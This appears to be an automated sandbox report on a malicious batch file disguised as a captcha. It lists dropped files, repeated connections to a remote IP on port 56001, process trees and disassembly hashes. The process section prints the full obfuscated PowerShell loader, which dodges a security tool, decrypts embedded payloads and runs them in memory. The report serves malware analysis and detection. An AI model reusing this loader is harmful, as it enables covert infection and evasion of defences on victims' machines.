            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40ertn1r.cpf.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3ntb4tm.ugs.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfttuavn.ydv.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

            Download File
            Process:C:\Windows\System32\svchost.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):55
            Entropy (8bit):4.306461250274409
            Encrypted:false
            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
            MD5:DCA83F08D448911A14C22EBCACC5AD57
            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
            Malicious:false
            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

            \Device\ConDrv

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with very long lines (2239), with CRLF line terminators
            Category:dropped
            Size (bytes):2241
            Entropy (8bit):5.781336491996957
            Encrypted:false
            SSDEEP:48:L1NXa+BX+rN2YWyvR0RiRxQ3BUM/BULXkpxkYec55S+o1Jf+oAtBWo:L98YYfaM7Q3Bf/Bxec55No7WoA1
            MD5:430C93E23C6BD570AF6DF7E58CE4EDEB
            SHA1:B8D4B3090E1B2D5C94B986692E2ABA2F32273AF2
            SHA-256:C915823634026AB60BDD8010245C4901F944FC113170BAC24AFD90A167ABB003
            SHA-512:59F2E568BA2D1F122C176F92E5AB1FA12A0DB4506BE0BD718A9AAA02C74246627880A871977A5630D0BEE56DAA8CBA332269163B14D31D2DA9BD103C764BD58E
            Malicious:false
            Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };functi

            Static File Info

            General

            File type:DOS batch file, ASCII text, with very long lines (65190), with CRLF line terminators
            Entropy (8bit):6.012676941063581
            TrID:
              File name:Captcha_V4ID882994ft.bat
              File size:451'904 bytes
              MD5:5744e74d67f4cc91f262ddb95ac245a3
              SHA1:890799de73d375478d3a5f0e2b86cec6a0585a91
              SHA256:e726d3324ca8b9a8da4d317c5d749dd0ad58fd447a2eb5eee75ef14824339cd5
              SHA512:9e30407dce840bb0c36b440b345572ba93bf7f9d2180b98255c371b2fc5d4289a27b74a9436148ff5448beb5f4d2160958625378122bad1920856b9da7807ea3
              SSDEEP:12288:tAyShKVnHj+CoqBG+OlBn/ZGkQdLDLP4yLu:tnJh+cOn+LDLP5i
              TLSH:74A423459EBAF9FA4E78753A615A21B2006DC9435F078E05F2F0C6EF1BA63A74433E14
              File Content Preview:@echo off..set "LbegCH=setLbegCH LbegCHgaLbegCHyLbegCHz=LbegCH1 LbegCH&&LbegCH stLbegCHarLbegCHt LbegCH""LbegCH /LbegCHmiLbegCHn LbegCH"..set "gDLIJK=&&gDLIJK gDLIJKexigDLIJKt"..set "OpJRBe=ifOpJRBe nOpJRBeotOpJRBe dOpJRBeefOpJRBeinOpJRBeeOpJRBed gOpJRBea

              File Icon

              Icon Hash:9686878b929a9886

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 27, 2024 16:58:10.567977905 CEST4973156001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:10.572869062 CEST5600149731185.91.69.119192.168.2.6
              Sep 27, 2024 16:58:10.572973967 CEST4973156001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:10.574585915 CEST4973156001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:10.579731941 CEST5600149731185.91.69.119192.168.2.6
              Sep 27, 2024 16:58:10.581005096 CEST4973156001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:10.585880995 CEST5600149731185.91.69.119192.168.2.6
              Sep 27, 2024 16:58:31.939425945 CEST5600149731185.91.69.119192.168.2.6
              Sep 27, 2024 16:58:31.939500093 CEST4973156001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:31.959265947 CEST4973156001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:31.964524984 CEST5600149731185.91.69.119192.168.2.6
              Sep 27, 2024 16:58:36.962277889 CEST4974256001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:36.967228889 CEST5600149742185.91.69.119192.168.2.6
              Sep 27, 2024 16:58:36.967317104 CEST4974256001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:36.967358112 CEST4974256001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:36.972240925 CEST5600149742185.91.69.119192.168.2.6
              Sep 27, 2024 16:58:36.972300053 CEST4974256001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:36.977087021 CEST5600149742185.91.69.119192.168.2.6
              Sep 27, 2024 16:58:58.350616932 CEST5600149742185.91.69.119192.168.2.6
              Sep 27, 2024 16:58:58.350794077 CEST4974256001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:58.351130962 CEST4974256001192.168.2.6185.91.69.119
              Sep 27, 2024 16:58:58.355915070 CEST5600149742185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:03.367800951 CEST4974756001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:03.372769117 CEST5600149747185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:03.372914076 CEST4974756001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:03.372987986 CEST4974756001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:03.378081083 CEST5600149747185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:03.378144026 CEST4974756001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:03.382958889 CEST5600149747185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:24.752773046 CEST5600149747185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:24.752933979 CEST4974756001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:24.753374100 CEST4974756001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:24.758377075 CEST5600149747185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:29.759114981 CEST4974856001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:29.764285088 CEST5600149748185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:29.764416933 CEST4974856001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:29.764467955 CEST4974856001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:29.769376993 CEST5600149748185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:29.769503117 CEST4974856001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:29.774393082 CEST5600149748185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:51.145376921 CEST5600149748185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:51.145495892 CEST4974856001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:51.145881891 CEST4974856001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:51.150748014 CEST5600149748185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:56.149730921 CEST4974956001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:56.154869080 CEST5600149749185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:56.154973984 CEST4974956001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:56.155025959 CEST4974956001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:56.159835100 CEST5600149749185.91.69.119192.168.2.6
              Sep 27, 2024 16:59:56.159915924 CEST4974956001192.168.2.6185.91.69.119
              Sep 27, 2024 16:59:56.164695978 CEST5600149749185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:17.537188053 CEST5600149749185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:17.537295103 CEST4974956001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:17.537863970 CEST4974956001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:17.557972908 CEST5600149749185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:22.540493965 CEST4975156001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:22.547631025 CEST5600149751185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:22.547727108 CEST4975156001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:22.547784090 CEST4975156001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:22.552675009 CEST5600149751185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:22.552755117 CEST4975156001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:22.557852983 CEST5600149751185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:43.912322044 CEST5600149751185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:43.912447929 CEST4975156001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:43.912868023 CEST4975156001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:43.918740988 CEST5600149751185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:48.915498972 CEST4975256001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:48.920450926 CEST5600149752185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:48.920547009 CEST4975256001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:48.920624018 CEST4975256001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:48.925426006 CEST5600149752185.91.69.119192.168.2.6
              Sep 27, 2024 17:00:48.925482988 CEST4975256001192.168.2.6185.91.69.119
              Sep 27, 2024 17:00:48.930308104 CEST5600149752185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:10.291172981 CEST5600149752185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:10.291409969 CEST4975256001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:10.291830063 CEST4975256001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:10.296689034 CEST5600149752185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:15.306164980 CEST4975356001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:15.311321020 CEST5600149753185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:15.311413050 CEST4975356001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:15.311444998 CEST4975356001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:15.317001104 CEST5600149753185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:15.317158937 CEST4975356001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:15.322303057 CEST5600149753185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:36.724767923 CEST5600149753185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:36.724942923 CEST4975356001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:36.725645065 CEST4975356001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:36.730444908 CEST5600149753185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:41.727988958 CEST4975456001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:41.733329058 CEST5600149754185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:41.733457088 CEST4975456001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:41.733531952 CEST4975456001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:41.738313913 CEST5600149754185.91.69.119192.168.2.6
              Sep 27, 2024 17:01:41.738399029 CEST4975456001192.168.2.6185.91.69.119
              Sep 27, 2024 17:01:41.743202925 CEST5600149754185.91.69.119192.168.2.6
              Sep 27, 2024 17:02:03.101488113 CEST5600149754185.91.69.119192.168.2.6
              Sep 27, 2024 17:02:03.101676941 CEST4975456001192.168.2.6185.91.69.119
              Sep 27, 2024 17:02:03.102116108 CEST4975456001192.168.2.6185.91.69.119
              Sep 27, 2024 17:02:03.106899023 CEST5600149754185.91.69.119192.168.2.6

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 27, 2024 16:57:53.311413050 CEST5608153192.168.2.61.1.1.1

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Sep 27, 2024 16:57:53.311413050 CEST192.168.2.61.1.1.10x343Standard query (0)tse1.mm.bing.netA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Sep 27, 2024 16:57:53.319272041 CEST1.1.1.1192.168.2.60x343No error (0)tse1.mm.bing.netmm-mm.bing.net.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
              Sep 27, 2024 16:57:53.319272041 CEST1.1.1.1192.168.2.60x343No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
              Sep 27, 2024 16:57:53.319272041 CEST1.1.1.1192.168.2.60x343No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:2
              Start time:10:57:57
              Start date:27/09/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Captcha_V4ID882994ft.bat" "
              Imagebase:0x7ff733500000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:3
              Start time:10:57:57
              Start date:27/09/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:4
              Start time:10:57:57
              Start date:27/09/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); "
              Imagebase:0x7ff733500000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:5
              Start time:10:57:57
              Start date:27/09/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Imagebase:0x10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:6
              Start time:10:57:58
              Start date:27/09/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              Imagebase:0x10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:15
              Start time:10:58:31
              Start date:27/09/2024
              Path:C:\Windows\System32\svchost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Imagebase:0x7ff7403e0000
              File size:55'320 bytes
              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Disassembly

              Reset < >

                Executed Functions

                Function 051629F0 Relevance: .2, Instructions: 244COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.2138037892.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_5160000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f5a482a5fb85a43bcf92f85ba50b6598f8e24e48a6ce44f5297875955cbf816b
                • Instruction ID: 5d23ca53c448df4530d957eed1ce05c45ea498035a74c71a97f4cffbac00f4a6
                • Opcode Fuzzy Hash: f5a482a5fb85a43bcf92f85ba50b6598f8e24e48a6ce44f5297875955cbf816b
                • Instruction Fuzzy Hash: 8BA17C78A00245DFCB15CF5CC4A89AEFBB1FF89310B248569D925AB365C735EC61CBA0
                Function 05162B00 Relevance: .1, Instructions: 110COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.2138037892.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_5160000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c350f142d95bfd7083b2678b6c5f25cf6ae41089ea9f0045365b1735fd6f6da0
                • Instruction ID: c6221c694d0d422381ffceb2cc9e54d7e05f1888ea483079139901963adde2af
                • Opcode Fuzzy Hash: c350f142d95bfd7083b2678b6c5f25cf6ae41089ea9f0045365b1735fd6f6da0
                • Instruction Fuzzy Hash: 9E4115B4A00605DFCB05CF58C5A8DAAFBB1FF48310B258559D965AB364C736FC61CBA0
                Function 05163110 Relevance: .1, Instructions: 74COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.2138037892.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_5160000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cbbe43c09f2cc67392ac55ac33684f7d43bfb37c61833c1c912c813d0b1709cd
                • Instruction ID: 2bdc800153be221002236c253e825b419be78645602247fbb97fdb4ff91b0c60
                • Opcode Fuzzy Hash: cbbe43c09f2cc67392ac55ac33684f7d43bfb37c61833c1c912c813d0b1709cd
                • Instruction Fuzzy Hash: 8A213BB4A04209DFCB04CF59C8949AAFBB1FF49310B158599E919E7752C735EC51CBA0
                Function 05163100 Relevance: .1, Instructions: 70COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.2138037892.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_5160000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 33f41ff0764db697869ec2bab536bf16e340b0bff42491a71e3c4044594139c6
                • Instruction ID: d72ca94d1c7570e896662bfba8846caa80cac84c5cae9adbc097b0f987fe114c
                • Opcode Fuzzy Hash: 33f41ff0764db697869ec2bab536bf16e340b0bff42491a71e3c4044594139c6
                • Instruction Fuzzy Hash: 40211974A006099FCB04CF99C8949AAFBB1FF89310B1585A9E919EB756C331EC51CBA0
                Function 04B8D01D Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.2137567257.0000000004B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B8D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_4b8d000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ae39072571d2cf8aab4c95e2094f36c9294d8d49d3f358a78e79f69683dc54da
                • Instruction ID: 7502759a4f81073fef5b06bb63573d9115fa1a7faf14740ba528f8ed399f257f
                • Opcode Fuzzy Hash: ae39072571d2cf8aab4c95e2094f36c9294d8d49d3f358a78e79f69683dc54da
                • Instruction Fuzzy Hash: 5E01F731504344DAE7106E39ED84B67BF9CDF41325F18809FDD084A2C2C279A442C6B1
                Function 04B8D006 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000006.00000002.2137567257.0000000004B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B8D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_4b8d000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5d2b37613cab19eb050538ee8fa9a75ed40f4c09d3134fd58b50a3b629266ad1
                • Instruction ID: ba8daa7a51c4bd34e4e3bb77877dc38dae1954e26230f25b400c692e6eb71485
                • Opcode Fuzzy Hash: 5d2b37613cab19eb050538ee8fa9a75ed40f4c09d3134fd58b50a3b629266ad1
                • Instruction Fuzzy Hash: B2015E6250E3C49FE7128B259C94B62BFA8EF52225F1980DBD9888F1D3C2699844C772

                Non-executed Functions

                Function 05161D6F Relevance: 22.7, Strings: 18, Instructions: 171COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2138037892.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_5160000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$m^
                • API String ID: 0-4262229165
                • Opcode ID: 0efbd1e58cac00f0c398f32f7e0c795327a241e1c4d9dd81f9e672fa8d92fba6
                • Instruction ID: 1cf78f4f3d33b696bcfba41b547a43eaa3006402924df0a8da01048a43501e80
                • Opcode Fuzzy Hash: 0efbd1e58cac00f0c398f32f7e0c795327a241e1c4d9dd81f9e672fa8d92fba6
                • Instruction Fuzzy Hash: 04414F9281EBE19FD313A63864A51D17F658F63254F0A01D7C9D0CF1A3F60589AEC3A6
                Function 05161E4B Relevance: 11.4, Strings: 9, Instructions: 108COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.2138037892.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_5160000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: k$k$k$k$k$k$k$k$m^
                • API String ID: 0-1023615329
                • Opcode ID: 11172b9683a76e82fecd8a9764df614aa7a642fea08bfa1b191062225a27e528
                • Instruction ID: 9a4f2a519b440b8357992345d04a3c56347425edef18a4b2a1261d5091180c72
                • Opcode Fuzzy Hash: 11172b9683a76e82fecd8a9764df614aa7a642fea08bfa1b191062225a27e528
                • Instruction Fuzzy Hash: 34313E9281E7E25FE313A73CA8B11D5BFA49F53154B0A01D7C9D0CF0A3E605999EC3A6